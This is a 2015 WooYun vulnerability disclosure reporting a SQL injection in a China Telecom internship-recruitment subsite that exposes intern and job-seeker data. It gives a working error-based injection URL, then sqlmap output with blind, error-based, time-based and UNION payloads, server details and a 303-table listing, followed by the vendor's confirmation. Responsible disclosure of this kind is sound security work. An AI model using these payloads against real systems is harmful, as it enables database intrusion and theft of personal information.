当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144241

漏洞标题:运营商安全之中国电信分站SQL注入漏洞影响大量实习生信息

相关厂商:中国电信

漏洞作者: 路人甲

提交时间:2015-09-30 16:11

修复时间:2015-11-24 16:42

公开时间:2015-11-24 16:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-30: 细节已通知厂商并且等待厂商处理中
2015-10-10: 厂商已经确认,细节仅向厂商公开
2015-10-20: 细节向核心白帽子及相关领域专家公开
2015-10-30: 细节向普通白帽子公开
2015-11-09: 细节向实习白帽子公开
2015-11-24: 细节向公众公开

简要描述:

实习生,学生,各种求职生信息..

详细说明:

http://**.**.**.**/shixibao/e/extend/company.php?id=10504


http://**.**.**.**/shixibao/e/extend/company.php?id=10504%20and (select 1 from  (select count(*),concat((select version()),floor(rand(0)*2))x from  information_schema.tables group by x)a)#


1.jpg


2.jpg


3.jpg


user:admin@**.**.**.**
database:shixibao1
version:5.6.16-log1


丢sqlmap跑一下


4.jpg


300个表,里面有大量实习生,求职生信息


5.jpg


6.jpg


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-2685 OR 5746=5746#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: id=-9802 OR 1 GROUP BY CONCAT(0x716b767671,(SELECT (CASE WHEN (5242=5242) THEN 1 ELSE 0 END)),0x717a706a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: id=(SELECT (CASE WHEN (5004=5004) THEN SLEEP(5) ELSE 5004*(SELECT 5004 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: id=-8000 UNION ALL SELECT CONCAT(0x716b767671,0x55514d6d4364655a7662,0x717a706a71)#
---
web server operating system: Windows
web application technology: PHP 5.5.11, Apache 2.4.9
back-end DBMS: MySQL 5.0.12
Database: shixibao
[303 tables]
+-------------------------------------+
| ecms_post_mapping |
| ecms_post_mapping_history |
| mm_zhiweiapply_view |
| phome_ecms_article |
| phome_ecms_article_check |
| phome_ecms_article_check_data |
| phome_ecms_article_data_1 |
| phome_ecms_article_doc |
| phome_ecms_article_doc_data |
| phome_ecms_article_doc_index |
| phome_ecms_article_index |
| phome_ecms_download |
| phome_ecms_download_check |
| phome_ecms_download_check_data |
| phome_ecms_download_data_1 |
| phome_ecms_download_doc |
| phome_ecms_download_doc_data |
| phome_ecms_download_doc_index |
| phome_ecms_download_index |
| phome_ecms_flash |
| phome_ecms_flash_check |
| phome_ecms_flash_check_data |
| phome_ecms_flash_data_1 |
| phome_ecms_flash_doc |
| phome_ecms_flash_doc_data |
| phome_ecms_flash_doc_index |
| phome_ecms_flash_index |
| phome_ecms_info |
| phome_ecms_info_check |
| phome_ecms_info_check_data |
| phome_ecms_info_data_1 |
| phome_ecms_info_doc |
| phome_ecms_info_doc_data |
| phome_ecms_info_doc_index |
| phome_ecms_info_index |
| phome_ecms_infoclass_article |
| phome_ecms_infoclass_download |
| phome_ecms_infoclass_flash |
| phome_ecms_infoclass_info |
| phome_ecms_infoclass_movie |
| phome_ecms_infoclass_news |
| phome_ecms_infoclass_photo |
| phome_ecms_infoclass_shop |
| phome_ecms_infoclass_tongzhi |
| phome_ecms_infoclass_zhiwei |
| phome_ecms_infoclass_zhiwei1 |
| phome_ecms_infoclass_zhiwei2 |
| phome_ecms_infoclass_zt |
| phome_ecms_infotmp_article |
| phome_ecms_infotmp_download |
| phome_ecms_infotmp_flash |
| phome_ecms_infotmp_info |
| phome_ecms_infotmp_movie |
| phome_ecms_infotmp_news |
| phome_ecms_infotmp_photo |
| phome_ecms_infotmp_shop |
| phome_ecms_infotmp_tongzhi |
| phome_ecms_infotmp_zhiwei |
| phome_ecms_infotmp_zhiwei1 |
| phome_ecms_infotmp_zhiwei2 |
| phome_ecms_infotmp_zt |
| phome_ecms_jianzhi_crawl |
| phome_ecms_jianzhi_crawl_test |
| phome_ecms_locationorder |
| phome_ecms_movie |
| phome_ecms_movie_check |
| phome_ecms_movie_check_data |
| phome_ecms_movie_data_1 |
| phome_ecms_movie_doc |
| phome_ecms_movie_doc_data |
| phome_ecms_movie_doc_index |
| phome_ecms_movie_index |
| phome_ecms_news |
| phome_ecms_news_check |
| phome_ecms_news_check_data |
| phome_ecms_news_data_1 |
| phome_ecms_news_doc |
| phome_ecms_news_doc_data |
| phome_ecms_news_doc_index |
| phome_ecms_news_index |
| phome_ecms_photo |
| phome_ecms_photo_check |
| phome_ecms_photo_check_data |
| phome_ecms_photo_data_1 |
| phome_ecms_photo_doc |
| phome_ecms_photo_doc_data |
| phome_ecms_photo_doc_index |
| phome_ecms_photo_index |
| phome_ecms_shop |
| phome_ecms_shop_check |
| phome_ecms_shop_check_data |
| phome_ecms_shop_data_1 |
| phome_ecms_shop_doc |
| phome_ecms_shop_doc_data |
| phome_ecms_shop_doc_index |
| phome_ecms_shop_index |
| phome_ecms_tongzhi |
| phome_ecms_tongzhi_check |
| phome_ecms_tongzhi_check_data |
| phome_ecms_tongzhi_data_1 |
| phome_ecms_tongzhi_doc |
| phome_ecms_tongzhi_doc_data |
| phome_ecms_tongzhi_doc_index |
| phome_ecms_tongzhi_index |
| phome_ecms_zhiwei |
| phome_ecms_zhiwei1 |
| phome_ecms_zhiwei1_check |
| phome_ecms_zhiwei1_check_data |
| phome_ecms_zhiwei1_data_1 |
| phome_ecms_zhiwei1_doc |
| phome_ecms_zhiwei1_doc_data |
| phome_ecms_zhiwei1_doc_index |
| phome_ecms_zhiwei1_index |
| phome_ecms_zhiwei2 |
| phome_ecms_zhiwei2_check |
| phome_ecms_zhiwei2_check_data |
| phome_ecms_zhiwei2_data_1 |
| phome_ecms_zhiwei2_doc |
| phome_ecms_zhiwei2_doc_data |
| phome_ecms_zhiwei2_doc_index |
| phome_ecms_zhiwei2_index |
| phome_ecms_zhiwei_check |
| phome_ecms_zhiwei_check_data |
| phome_ecms_zhiwei_crawl |
| phome_ecms_zhiwei_crawl_1 |
| phome_ecms_zhiwei_crawl_copy |
| phome_ecms_zhiwei_crawl_copy_backup |
| phome_ecms_zhiwei_crawl_copy_cl |
| phome_ecms_zhiwei_crawl_sxs |
| phome_ecms_zhiwei_crawl_sxs1 |
| phome_ecms_zhiwei_crawl_sxs_copy |
| phome_ecms_zhiwei_crawl_test |
| phome_ecms_zhiwei_data_1 |
| phome_ecms_zhiwei_doc |
| phome_ecms_zhiwei_doc_data |
| phome_ecms_zhiwei_doc_index |
| phome_ecms_zhiwei_history |
| phome_ecms_zhiwei_index |
| phome_ecms_zt |
| phome_ecms_zt_check |
| phome_ecms_zt_check_data |
| phome_ecms_zt_data_1 |
| phome_ecms_zt_doc |
| phome_ecms_zt_doc_data |
| phome_ecms_zt_doc_index |
| phome_ecms_zt_index |
| phome_enewsad |
| phome_enewsadclass |
| phome_enewsadminstyle |
| phome_enewsbefrom |
| phome_enewsbq |
| phome_enewsbqclass |
| phome_enewsbqtemp |
| phome_enewsbqtempclass |
| phome_enewsbuybak |
| phome_enewsbuygroup |
| phome_enewscard |
| phome_enewsclass |
| phome_enewsclass_stats |
| phome_enewsclass_stats_ip |
| phome_enewsclass_stats_set |
| phome_enewsclassadd |
| phome_enewsclassf |
| phome_enewsclassnavcache |
| phome_enewsclasstemp |
| phome_enewsclasstempclass |
| phome_enewsdiggips |
| phome_enewsdo |
| phome_enewsdolog |
| phome_enewsdownerror |
| phome_enewsdownrecord |
| phome_enewsdownurlqz |
| phome_enewserrorclass |
| phome_enewsf |
| phome_enewsfava |
| phome_enewsfavaclass |
| phome_enewsfeedback |
| phome_enewsfeedbackclass |
| phome_enewsfeedbackf |
| phome_enewsfile_1 |
| phome_enewsfile_member |
| phome_enewsfile_other |
| phome_enewsfile_public |
| phome_enewsgbook |
| phome_enewsgbookclass |
| phome_enewsgfenip |
| phome_enewsgroup |
| phome_enewshmsg |
| phome_enewshnotice |
| phome_enewshy |
| phome_enewshyclass |
| phome_enewsindexpage |
| phome_enewsinfoclass |
| phome_enewsinfotype |
| phome_enewsinfovote |
| phome_enewsjstemp |
| phome_enewsjstempclass |
| phome_enewskey |
| phome_enewskeyclass |
| phome_enewslink |
| phome_enewslinkclass |
| phome_enewslinktmp |
| phome_enewslisttemp |
| phome_enewslisttempclass |
| phome_enewslog |
| phome_enewsloginfail |
| phome_enewsmember |
| phome_enewsmember_connect |
| phome_enewsmember_connect_app |
| phome_enewsmemberadd |
| phome_enewsmemberf |
| phome_enewsmemberfeedback |
| phome_enewsmemberform |
| phome_enewsmembergbook |
| phome_enewsmembergroup |
| phome_enewsmemberpub |
| phome_enewsmenu |
| phome_enewsmenuclass |
| phome_enewsmod |
| phome_enewsnewstemp |
| phome_enewsnewstempclass |
| phome_enewsnotcj |
| phome_enewsnotice |
| phome_enewspage |
| phome_enewspageclass |
| phome_enewspagetemp |
| phome_enewspayapi |
| phome_enewspayrecord |
| phome_enewspic |
| phome_enewspicclass |
| phome_enewspl_1 |
| phome_enewspl_set |
| phome_enewsplayer |
| phome_enewsplf |
| phome_enewspltemp |
| phome_enewspostdata |
| phome_enewspostserver |
| phome_enewsprinttemp |
| phome_enewspublic |
| phome_enewspublic_update |
| phome_enewspubtemp |
| phome_enewspubvar |
| phome_enewspubvarclass |
| phome_enewsqmsg |
| phome_enewssearch |
| phome_enewssearchall |
| phome_enewssearchall_load |
| phome_enewssearchtemp |
| phome_enewssearchtempclass |
| phome_enewsshop_address |
| phome_enewsshop_ddlog |
| phome_enewsshop_precode |
| phome_enewsshop_set |
| phome_enewsshopdd |
| phome_enewsshopdd_add |
| phome_enewsshoppayfs |
| phome_enewsshopps |
| phome_enewssp |
| phome_enewssp_1 |
| phome_enewssp_2 |
| phome_enewssp_3 |
| phome_enewssp_3_bak |
| phome_enewsspacestyle |
| phome_enewsspclass |
| phome_enewssql |
| phome_enewstable |
| phome_enewstags |
| phome_enewstagsclass |
| phome_enewstagsdata |
| phome_enewstask |
| phome_enewstempbak |
| phome_enewstempdt |
| phome_enewstempgroup |
| phome_enewstempvar |
| phome_enewstempvarclass |
| phome_enewstogzts |
| phome_enewsuser |
| phome_enewsuseradd |
| phome_enewsuserclass |
| phome_enewsuserjs |
| phome_enewsuserjsclass |
| phome_enewsuserlist |
| phome_enewsuserlistclass |
| phome_enewsuserloginck |
| phome_enewsvote |
| phome_enewsvotemod |
| phome_enewsvotetemp |
| phome_enewswapstyle |
| phome_enewswfinfo |
| phome_enewswfinfolog |
| phome_enewswords |
| phome_enewsworkflow |
| phome_enewsworkflowitem |
| phome_enewswriter |
| phome_enewsyh |
| phome_enewszt |
| phome_enewsztadd |
| phome_enewsztclass |
| phome_enewsztf |
| phome_enewsztinfo |
| phome_enewszttype |
| phome_enewszttypeadd |
| yjsqzw |
+-------------------------------------+

漏洞证明:

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-10-10 16:40

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价